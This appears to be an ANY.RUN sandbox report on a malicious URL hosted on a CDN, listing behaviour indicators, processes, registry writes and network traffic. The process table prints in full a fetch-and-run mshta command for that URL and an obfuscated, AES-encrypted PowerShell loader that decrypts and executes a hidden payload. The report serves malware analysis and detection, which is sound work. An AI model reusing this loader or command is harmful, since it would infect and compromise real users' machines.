URL:

https://popad01.b-cdn.net/popad

Full analysis: https://app.any.run/tasks/5cbd3fc5-e86f-44af-bc89-3e921a48b0d2
Verdict: Malicious activity
Analysis date: August 26, 2024, 07:24:32
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MD5:

3289682D8FB849C62B22736E4C820243

SHA1:

78AAC81ECE86CD3C302FE958905736A3915D9890

SHA256:

CE0E2785973B05DE9E138676490D0A9F6A3566E42315A21D313E711C0C89508A

SSDEEP:

3:N8OO+LH7BglO:2OO+LHulO

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Scans artifacts that could help determine the target

      • mshta.exe (PID: 4248)

    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 4248)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 2128)

    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 2128)

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 2128)

    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 2128)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 2128)

  • SUSPICIOUS

    • Process drops legitimate windows executable

      • chrome.exe (PID: 6560)
      • mshta.exe (PID: 4248)

    • Drops the executable file immediately after the start

      • mshta.exe (PID: 4248)

    • Executable content was dropped or overwritten

      • mshta.exe (PID: 4248)

    • Cryptography encrypted command line is found

      • powershell.exe (PID: 2128)

    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 4248)

    • Probably obfuscated PowerShell command line is found

      • mshta.exe (PID: 4248)

    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 4248)

    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 2128)

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 2128)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 2128)

  • INFO

    • Reads Microsoft Office registry keys

      • chrome.exe (PID: 6560)

    • Application launched itself

      • chrome.exe (PID: 6560)

    • Checks proxy server information

      • mshta.exe (PID: 4248)
      • powershell.exe (PID: 2128)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 4248)

    • Executable content was dropped or overwritten

      • chrome.exe (PID: 6560)

    • Manual execution by a user

      • cmd.exe (PID: 2384)
      • notepad.exe (PID: 5532)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 2128)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2128)

    • Disables trace logs

      • powershell.exe (PID: 2128)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 2128)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 2128)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
156
Monitored processes
23
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs cmd.exe conhost.exe no specs mshta.exe powershell.exe conhost.exe no specs rundll32.exe no specs chrome.exe no specs chrome.exe no specs notepad.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
780"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --disable-quic --no-appcompat-clear --mojo-platform-channel-handle=4204 --field-trial-handle=1892,i,14410865431092680028,12900675774836959758,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
1564"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --disable-quic --no-appcompat-clear --mojo-platform-channel-handle=1320 --field-trial-handle=1892,i,14410865431092680028,12900675774836959758,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
1992"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --disable-quic --no-appcompat-clear --mojo-platform-channel-handle=5072 --field-trial-handle=1892,i,14410865431092680028,12900675774836959758,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
2128"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function YLsclSN($DcLSzdy){return -split ($DcLSzdy -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$YQICcj = YLsclSN('D4E7B097A2BE301A22323049D9788F10CF473B6AA4C63ED73BB1B7CAABC24A09C19F1693D083839B4F02BB08018E9A6DA501BFA313FD1FA09230485BACD6CD2E8D11BAF2C91B2F03CABB0EE0B4DD2405FE3E5DF8D3A582D52B82512D0ECE511D020A01E65B7CAF180A803B74E9C47EA48004C2ECEE0C45731EABF8F6C5C0EAAB51506737E386CC756E91FA0B837102439D265E6C3CA609C94177C4A1403B8C4435EA0A890A67ECEEEB52A3A8667CA9840814CC48D00FE06FE2A71188667B0D6FA907FD0833C3F6204053EFF2901330FB9543B25891A5B73E9CC9383B16B11DB6254BE131252568128AB4CCA5D3E7CF0B541F199A101694713F38CF73169E801495A54A951E6B675F4FD8947E22A02C7719410FD6766B86A2B8C5DC166282749D15812EF9E928FE0B1D31462DFF7EC2C8070958EDF7EFFA5CB00F94A38B296D619EC16EB2C9F3EC327C05CC366B6FEF5E8CE0A1980CB48F2625F54572706AA579C26DA461F80A93E70DC11A2CC382135A5DE7EB63C86049F21E1B04FBF8395993D53D2C3F12AA85E6DB8DC26EA2A82BD3D87F8E1C6C02EDBF083F9B0090FB441A9E31B0F198A19F6092CA4F630CBEC38079383069B2E45E3636FF21E44494D90B14E5956720197C697452A40DD4142B8E187220B978A77FFF6C5B1B10EED279ED204490F0FCEF535F03E98F5718710A6F41EE3BF75B293C5FF2340820F6E743E699725F3EDAB0C549731225277396BF09CCB2BE0434BD895986AC4F539E90777F4D24A60EE230A891B94FDF8672E650613ECF6B582558528D41F2FCAF49E9859D5076BBB5D2C1FDBC51720D74B6C2DBFAEF003E63CF356705D01CF0235BC52AD68D54519A335C0EA85DAD043AD28582438A8026BDD40238B08B09B5D3315A2418D2D68D8BFDE28E6EB629CFE3092AF638F0DC1365AFCC5D20F8D16321822835C4A293BAFF3ABC45272AF14812D1B64FF5E49D73C8EB9EFA11E775B9C2E593E0E9305437775A2A09D0A50CEE29A4A461D7CB430B15575FDD4BDF1575BA624681402F6CBB85A494848BC7ED4126E544A32EC5C22269B66EB430BA701D9F9AFA90367433ECAB798B57A597DFD1370ACFF57DAB7F24580E5E7AFF74742CD3BC43048209930A36B1708CBAECAFC954A62D0E19C9344030DDA6EE6613E671DB4BB8CECDD61ED0AEE9FAE1C96057070DFE1D1BAFF74FC41FD20396892008FB039479F73FF97612FA3C623098F3C26CEADED0D04D876AA4B9160E47CED3F78C25A06163F88865E2308BCE949DE85F21848EAAF62CEB05BB5BCA30F7B959C08C8A6542FF4A26CC6F2632E6CA43FD5D9AD63725CB03D162934F3AC31644032BE1DEE27712A493746616FF65FC2B3A603CD25887BBAF318A183CBB798DEDCA418F3EBC6A1317A6C77288B5D375301F0FE9BB4AA14CC6BC624A86168FB7CD5BFB9E9EBCA32BBA6AC6E2E959ADD439FF0B1FBC8E97A3F8129C2BF9E88301FBAD01629AAF51423F7756FA6918DEEA5C03910725B0D7A9817F0CA65A99884313C3AB9A87909D1CDD');$AHeXM = [System.Security.Cryptography.Aes]::Create();$AHeXM.Key = YLsclSN('6F52767846745970454E484973576267');$AHeXM.IV = New-Object byte[] 16;$YxbWLiCc = $AHeXM.CreateDecryptor();$RqbFOvhOa = $YxbWLiCc.TransformFinalBlock($YQICcj, 0, $YQICcj.Length);$AkkWZIqvj = [System.Text.Encoding]::Utf8.GetString($RqbFOvhOa);$YxbWLiCc.Dispose();& $AkkWZIqvj.Substring(0,3) $AkkWZIqvj.Substring(3)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2252"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.3636 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoABAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=4800 --field-trial-handle=1892,i,14410865431092680028,12900675774836959758,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
2384"C:\WINDOWS\system32\cmd.exe" C:\Windows\System32\cmd.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\wldp.dll
2616"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --disable-quic --no-appcompat-clear --mojo-platform-channel-handle=5056 --field-trial-handle=1892,i,14410865431092680028,12900675774836959758,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
3672C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -EmbeddingC:\Windows\System32\rundll32.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\windows\system32\imagehlp.dll
4076"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --disable-quic --no-appcompat-clear --mojo-platform-channel-handle=4988 --field-trial-handle=1892,i,14410865431092680028,12900675774836959758,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
4248mshta.exe https://popad01.b-cdn.net/popadC:\Windows\System32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
Total events
24 316
Read events
24 256
Write events
54
Delete events
6

Modification events

(PID) Process:(6560) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(6560) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
2
(PID) Process:(6560) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\ThirdParty
Operation:writeName:StatusCodes
Value:
(PID) Process:(6560) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\ThirdParty
Operation:writeName:StatusCodes
Value:
01000000
(PID) Process:(6560) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
1
(PID) Process:(6560) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
Operation:writeName:dr
Value:
1
(PID) Process:(6560) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\StabilityMetrics
Operation:writeName:user_experience_metrics.stability.exited_cleanly
Value:
0
(PID) Process:(6560) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome
Operation:writeName:UsageStatsInSample
Value:
0
(PID) Process:(6560) chrome.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}
Operation:writeName:usagestats
Value:
0
(PID) Process:(6560) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
Operation:writeName:metricsid
Value:
Executable files
6
Suspicious files
184
Text files
40
Unknown types
4

Dropped files

PID
Process
Filename
Type
6560chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\discounts_db\LOG.old
MD5:
SHA256:
6560chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\LOG.old
MD5:
SHA256:
6560chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db\LOG.old
MD5:
SHA256:
6560chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG.old~RF11e2cb.TMP
MD5:
SHA256:
6560chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG.old
MD5:
SHA256:
6560chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old
MD5:
SHA256:
6560chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old~RF11e2cb.TMP
MD5:
SHA256:
6560chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old
MD5:
SHA256:
6560chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old~RF11e2ac.TMPtext
MD5:8F45965291AB2DA10EEB049FB6E917C6
SHA256:8A0DE526945B27CDBBD87357C85FDDD37B572370F894CB0A5AC533FD465D2166
6560chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Last Versiontext
MD5:FCE53E052E5CF7C20819320F374DEA88
SHA256:CD95DE277E746E92CC2C53D9FC92A8F6F0C3EDFB7F1AD9A4E9259F927065BC89
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
30
TCP/UDP connections
57
DNS requests
38
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5888
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
5888
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
4084
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5336
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
whitelisted
5336
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
4248
mshta.exe
GET
200
172.64.149.23:80
http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEH1bUSa0droR23QWC7xTDac%3D
unknown
whitelisted
4248
mshta.exe
GET
200
172.64.149.23:80
http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEDlyRDr5IrdR19NsEN0xNZU%3D
unknown
whitelisted
2456
svchost.exe
HEAD
200
34.104.35.123:80
http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ljuy5utbmkjci5e5miuev7yurq_2024.8.26.1/kiabhabjdbkjdpjbpigfodbdjmbglcoo_2024.08.26.01_all_kb4ip46nwy3x2jxrkmqsewlfhm.crx3
unknown
whitelisted
4248
mshta.exe
GET
200
172.64.149.23:80
http://ocsp.sectigo.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRDC9IOTxN6GmyRjyTl2n4yTUczyAQUjYxexFStiuF36Zv5mwXhuAGNYeECEQCb80pEPlZ04x2fAu4YLy1O
unknown
whitelisted
2456
svchost.exe
GET
206
34.104.35.123:80
http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ljuy5utbmkjci5e5miuev7yurq_2024.8.26.1/kiabhabjdbkjdpjbpigfodbdjmbglcoo_2024.08.26.01_all_kb4ip46nwy3x2jxrkmqsewlfhm.crx3
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
2616
RUXIMICS.exe
51.124.78.146:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2120
MoUsoCoreWorker.exe
51.124.78.146:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5300
svchost.exe
51.124.78.146:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6560
chrome.exe
239.255.255.250:1900
whitelisted
6816
chrome.exe
108.177.127.84:443
accounts.google.com
GOOGLE
US
unknown
6816
chrome.exe
138.199.37.225:443
popad01.b-cdn.net
Datacamp Limited
DE
unknown
6816
chrome.exe
142.250.185.206:443
sb-ssl.google.com
GOOGLE
US
whitelisted
6560
chrome.exe
224.0.0.251:5353
unknown
5300
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 216.58.206.78
whitelisted
popad01.b-cdn.net
  • 138.199.37.225
  • 138.199.36.7
whitelisted
accounts.google.com
  • 108.177.127.84
whitelisted
sb-ssl.google.com
  • 142.250.185.206
whitelisted
settings-win.data.microsoft.com
  • 20.73.194.208
  • 51.104.136.2
whitelisted
www.google.com
  • 216.58.206.68
whitelisted
client.wns.windows.com
  • 40.113.110.67
  • 40.113.103.199
whitelisted
www.bing.com
  • 92.123.104.28
  • 92.123.104.31
  • 92.123.104.26
  • 92.123.104.30
  • 92.123.104.20
  • 92.123.104.25
  • 92.123.104.24
  • 92.123.104.29
  • 92.123.104.23
whitelisted
th.bing.com
  • 92.123.104.38
  • 92.123.104.46
  • 92.123.104.45
  • 92.123.104.44
  • 92.123.104.34
  • 92.123.104.36
  • 92.123.104.40
  • 92.123.104.41
  • 92.123.104.42
whitelisted
r.bing.com
  • 92.123.104.60
  • 92.123.104.64
  • 92.123.104.4
  • 92.123.104.63
  • 92.123.104.58
  • 92.123.104.66
  • 92.123.104.62
  • 92.123.104.57
  • 92.123.104.61
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
https://popad01.b-cdn.net/popad